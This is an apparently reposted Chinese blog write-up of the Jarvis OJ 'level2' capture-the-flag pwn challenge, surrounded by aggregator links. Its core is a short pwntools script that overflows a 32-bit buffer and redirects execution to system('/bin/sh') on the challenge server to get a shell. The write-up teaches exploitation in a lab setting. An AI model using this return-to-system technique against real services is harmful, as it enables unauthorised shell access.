jarvis oj level2 - 代码天地

jarvis oj level2

其他 2018-12-22 02:47:15 阅读次数: 0

拖进ida，直接就看到了system函数，同时搜索一下，发现了“bin/sh”，没什么好说的，上脚本

from pwn import *
conn=remote("pwn2.jarvisoj.com","9878")
conn.recvline()
e=ELF("./level2")
sys_addr=e.symbols['system']
pad=0x88
sh_addr=e.search("/bin/sh").next()
payload="A"*pad+"BBBB"+p32(sys_addr)+"dead"+p32(sh_addr)
conn.sendline(payload)
conn.interactive()

收获：
recv是不显示返回的字串，保存到缓冲区。注意查找字符串的格式，后面有next()。

猜你喜欢

转载自blog.csdn.net/weixin_41617275/article/details/84678812

BUUCTF jarvisoj_level2

jarvis oj level2

【BUUCTF - PWN】jarvisoj_level2

(Jarvis Oj)(Pwn) level2

Jarvis OJ [XMAN]level2

[Jarvis OJ - PWN]——[XMAN]level2

Jarvis Oj Pwn 学习笔记-level2

(Jarvis Oj)(Pwn) level2(x64)

Jarvis OJ [XMAN]level2(x64)

[Jarvis OJ - PWN]——[XMAN]level2(x64)

18.9.19 Jarvis OJ PWN----[XMAN]level2(x64)

Jarvis OJ (2)

Jarvis OJ　level1

jarvis oj level5

jarvis oj level1

jarvis oj level0

jarvis oj level4

Jarvis oj level3

jarvis oj level2_x64

(Jarvis Oj)(Pwn) level3

(Jarvis Oj)(Pwn) level1

(Jarvis Oj)(Pwn) level0

(Jarvis Oj)(Pwn) level5

(Jarvis Oj)(Pwn) level4

[XMAN]level5　Jarvis OJ

Jarvis OJ　[XMAN]level0

jarvis oj level3_x64

level3-64——Jarvis OJ

Jarvis OJ PWN level3

Jarvis OJ PWN level1

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

循环神经网络（rnn）讲解

Tigao教程四：单独的关节运动

金蝶K3WISE15.0-注册套打教程

如何在Mac上配置Kubernetes

Android应用结束自身进程的方法

SpringMVC学习十三拦截器栈

中国驻洛杉矶总领馆举行新春招待会

HttpClient get post 发送

11 - three.js 笔记 - 绘制三维字体模型

Mysql递归获取某个父节点下面的所有子节点和子节点上的所有父节点

每日归档

更多

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)